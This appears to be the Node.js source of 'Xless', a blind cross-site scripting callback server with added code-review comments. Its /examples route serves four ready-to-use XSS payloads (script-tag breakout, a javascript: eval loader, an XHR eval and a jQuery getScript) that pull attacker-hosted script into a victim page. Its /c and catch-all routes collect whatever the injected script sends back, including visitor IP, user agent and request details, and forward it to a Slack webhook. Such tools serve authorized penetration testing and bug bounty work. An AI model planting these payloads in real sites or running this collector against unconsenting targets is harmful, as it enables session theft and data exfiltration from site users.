// Xless: The Serverless Blind XSS App.
// Version: v1.1
// Author: Mazin Ahmed <[email protected]>
const express = require("express");
var bodyParser = require("body-parser");
var cors = require("cors");
const process = require("process");
var request = require("request");
// Listening port: PORT from the environment, falling back to 3000.
const port = process.env.PORT || 3000;
const app = express();

// Global middleware, in registration order: cors() with its default options,
// then JSON body parsing for every route.
app.use(cors());
app.use(bodyParser.json());

// Stamp a fixed set of response headers on every request before routing
// continues.
// NOTE(review): "Access-Control-Allow-Origin: *" lets any origin read these
// responses from a browser. That looks intentional for a callback collector,
// but it means no route here should ever return sensitive data — confirm.
app.use((req, res, next) => {
  res
    .header("Powered-By", "XLESS")
    .header("Access-Control-Allow-Origin", "*")
    .header("Access-Control-Allow-Methods", "GET,POST")
    .header("Access-Control-Allow-Headers", "Content-Type");
  next();
});
/**
 * Build the Slack mrkdwn text for a blind-XSS report.
 *
 * The result is a fixed title line followed by one line per own enumerable
 * key of `body`: the key in bold markers, the value inside a triple-backtick
 * code span. An empty-string value is rendered as "None"; any other value is
 * string-concatenated as-is.
 *
 * NOTE(review): keys and values are inserted without neutralising backticks
 * or other Slack formatting characters. The POST /c route passes the parsed
 * request body here, so this text is attacker-influenced — confirm how the
 * receiving workspace renders it.
 *
 * @param {Object} body - Key/value pairs to report.
 * @returns {string} The alert text; every line ends in "\n".
 */
function generate_blind_xss_alert(body) {
  const lines = Object.keys(body).map((key) => {
    const shown = body[key] === "" ? "None" : body[key];
    return "*" + key + ":* " + "```" + shown + "```" + "\n";
  });
  return "*XSSless: Blind XSS Alert*\n" + lines.join("");
}
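/**
 * Build the Slack mrkdwn text for an out-of-band callback hit.
 *
 * Always reports the remote IP, User-Agent and request URI; adds a Referrer
 * line when the request carried one.
 *
 * All interpolated values come from the incoming request and are inserted
 * without escaping, so they should be read as untrusted when triaging the
 * alert.
 *
 * @param {Object} headers - Request headers (Node supplies lower-cased names).
 * @param {Object} data - Object whose "Remote IP" property holds the client address.
 * @param {string} url - The requested URL.
 * @returns {string} The alert text; every line ends in "\n".
 */
function generate_callback_alert(headers, data, url) {
  let alert = "*XSSless: Out-of-Band Callback Alert*\n";
  alert += `• *IP Address:* \`${data["Remote IP"]}\`\n`;
  alert += `• *User-Agent:* \`${headers["user-agent"]}\`\n`;
  alert += `• *Request URI:* \`${url}\`\n`;

  // Node lower-cases incoming header names and the HTTP header is spelled
  // "referer", so the previous test on headers["Referrer"] never matched a
  // real request. The other two spellings are kept for callers that pass
  // them explicitly.
  const referrerKey = ["referer", "referrer", "Referrer"].find(
    (name) => headers[name] !== undefined
  );
  if (referrerKey !== undefined) {
    alert += `• *Referrer:* \`${headers[referrerKey]}\`\n`;
  }
  return alert;
}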
// GET /examples — returns a plain-text list of example snippets that load a
// script from this server's own origin.
app.get("/examples", (req, res) => {
  // The scheme is fixed to https (req.protocol is not used); the host is taken
  // verbatim from the request's Host header.
  // NOTE(review): Host is client-supplied and is reflected into the response.
  // The text/plain content type is what keeps it inert; consider also sending
  // "X-Content-Type-Options: nosniff" so browsers do not sniff it as HTML.
  const url = 'https://' + req.headers['host'];

  const snippets = [
    `\'"><script src="${url}"></script>\n\n`,
    `javascript:eval('var a=document.createElement(\\'script\\');a.src=\\'${url}\\';document.body.appendChild(a)')\n\n`,
    `<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "${url}");a.send();</script>\n\n`,
    `<script>$.getScript("${url}")</script>`,
  ];

  res.header("Content-Type", "text/plain");
  res.send(snippets.join(""));
  res.end();
});
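// POST /c — accepts a JSON report, formats it with generate_blind_xss_alert
// and forwards it to the Slack incoming webhook named by
// SLACK_INCOMING_WEBHOOK. The client always receives "ok\n".
app.post("/c", (req, res) => {
  // X-Forwarded-For is client-supplied unless a trusted proxy overwrites it,
  // so the reported address is a hint, not proof of origin.
  const remoteIp = req.headers["x-forwarded-for"] || req.connection.remoteAddress;

  // Work on a copy instead of writing into req.body; this also tolerates a
  // request whose body was not parsed. Key order matches the original object,
  // with "Remote IP" appended (or overwritten in place if already present).
  const report = Object.assign({}, req.body, { "Remote IP": remoteIp });
  const alert = generate_blind_xss_alert(report);
  const slackRequest = {
    form: {
      payload: JSON.stringify({ username: "XLess", mrkdwn: true, text: alert }),
    },
  };

  request.post(process.env.SLACK_INCOMING_WEBHOOK, slackRequest, (err, slackRes) => {
    // The first callback argument is the error. Record delivery failures so a
    // lost alert is visible in the server log. Only the code/name is logged:
    // error messages may echo the target URI, and the webhook URL is a secret.
    if (err) {
      console.error("Slack webhook delivery failed:", err.code || err.name);
    } else if (slackRes && slackRes.statusCode >= 400) {
      console.error("Slack webhook rejected the alert, status", slackRes.statusCode);
    }
    // The reply stays constant whatever happened upstream, so the reporting
    // page learns nothing about the delivery result.
    res.send("ok\n");
  });
});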
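// GET /* — catch-all callback route. Every hit is summarised with
// generate_callback_alert and forwarded to the Slack incoming webhook named by
// SLACK_INCOMING_WEBHOOK. The client always receives "ok\n".
app.get("/*", (req, res) => {
  // X-Forwarded-For is client-supplied unless a trusted proxy overwrites it,
  // so the reported address is a hint, not proof of origin.
  const remoteIp = req.headers["x-forwarded-for"] || req.connection.remoteAddress;

  // generate_callback_alert reads only "Remote IP" from its data argument, so
  // pass a fresh object. This no longer depends on req.body being populated
  // for a GET request and does not write into it.
  const alert = generate_callback_alert(req.headers, { "Remote IP": remoteIp }, req.url);
  const slackRequest = {
    form: {
      payload: JSON.stringify({ username: "XLess", mrkdwn: true, text: alert }),
    },
  };

  request.post(process.env.SLACK_INCOMING_WEBHOOK, slackRequest, (err, slackRes) => {
    // The first callback argument is the error. Record delivery failures so a
    // lost alert is visible in the server log. Only the code/name is logged:
    // error messages may echo the target URI, and the webhook URL is a secret.
    if (err) {
      console.error("Slack webhook delivery failed:", err.code || err.name);
    } else if (slackRes && slackRes.statusCode >= 400) {
      console.error("Slack webhook rejected the alert, status", slackRes.statusCode);
    }
    // The reply stays constant whatever happened upstream.
    res.send("ok\n");
  });
});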
// Start the HTTP listener on the configured port. An error handed to the
// listen callback is rethrown; otherwise a readiness line is printed.
app.listen(port, function onListening(err) {
  if (err) {
    throw err;
  }
  console.log(`> Ready On Server http://localhost:${port}`);
});